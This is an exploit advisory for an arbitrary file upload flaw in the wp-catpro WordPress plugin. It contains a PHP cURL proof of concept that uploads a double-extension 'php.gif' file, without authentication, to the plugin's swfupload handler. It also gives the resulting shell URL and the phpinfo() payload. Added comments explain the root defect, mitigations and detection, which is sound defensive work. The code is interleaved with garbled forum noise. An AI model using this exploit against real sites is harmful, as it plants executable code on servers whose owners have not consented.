WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
1 U8 W7 g" k$ y; l. ~0 ^
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
/ H7 D1 c9 B9 Y* F! X n
#=> Exploit
-----------
<?php
// Review notes (defender's reading of the advisory's proof-of-concept).
// The original lines are kept verbatim below, including the forum
// anti-scrape noise the page was captured with; only comments were added.
//
// What the script demonstrates: a single multipart POST to the plugin's
// bundled swfupload handler (js/swfupload/js/upload.php) carrying a file
// whose name ends in ".gif" plus a client-chosen destination folder.
// No cookie, nonce or Authorization header is set on the handle, so if the
// request succeeds the handler is accepting uploads without any WordPress
// authentication — that, not the double extension, is the root defect.
) J$ X) y) }- `9 [' s' X6 E' ? / Y9 ?# L# o, c: I+ O
// Local file to send. Its final extension (.gif) matches the allow-list
// quoted earlier on this page ("jpg", "gif", "png"); presumably the handler
// only inspects that last segment — confirm against the plugin's upload.php
// (not shown here).
$uploadfile="zik.php.gif";
2 v b& B5 X) M( \1 s8 s9 D$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* a0 R" k7 t6 k# pcurl_setopt($ch, CURLOPT_POST, true);+ A/ ^) W/ }; Q9 t
// "@filename" is the legacy PHP-cURL syntax for attaching a file as a
// multipart upload (removed in PHP 7; CURLFile replaced it), so this PoC as
// written only runs on old PHP. 'folder' is supplied by the client; if the
// handler concatenates it unvalidated, the write location is attacker-
// controlled as well (path-traversal exposure) — verify in upload.php.
curl_setopt($ch, CURLOPT_POSTFIELDS,
/ L. E' Y/ D5 @2 T7 T& Rarray('Filedata'=>"@$uploadfile",( x7 T$ D) @7 }; |8 w
'folder'=>'/wp-content/uploads/catpro/'));
& }( E$ G+ T! r; p) s7 I: x0 a3 Vcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ @% B, M9 G1 q8 C$postResult = curl_exec($ch);% e% ~/ u5 k3 c( {1 J4 Q6 m* K3 k
curl_close($ch);
8 V+ g9 y0 f- O& x( D8 [ 6 d2 N# X; i1 z8 Y, F
// The handler's raw response is echoed; per the advisory it includes the
// randomised stored filename.
print "$postResult";
P% w% p. o& I4 \$ d n
// Mitigation for site owners: remove or replace the plugin's standalone
// upload handler; require a logged-in, capability-checked user and a nonce
// on any upload endpoint; validate the whole filename (reject any ".php"
// segment) and the detected MIME type, not just the last extension; ignore
// client-supplied destination paths; and deny script execution under
// wp-content/uploads at the web-server level so a stored .php.gif cannot run.
// Detection: POSTs to .../wp-catpro/js/swfupload/js/upload.php from
// unauthenticated sessions, and new multi-extension files appearing under
// wp-content/uploads/catpro/.
3 x- d" b1 v4 Y' l* a' Q3 LShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
* b# A m! P5 _ ?>
4 o. F" y9 c8 w( v* K! J5 o" _' J<?php
// Contents of the file the PoC uploads: phpinfo() is used purely as an
// execution probe. Seeing its output at the stored ".php.gif" URL proves the
// web server executes files under wp-content/uploads — the condition that
// server-side handler configuration should rule out.
6 P, y1 I9 ~( R _( nphpinfo();. Z. ?4 V& X/ a6 {" Q- T8 Q
?> |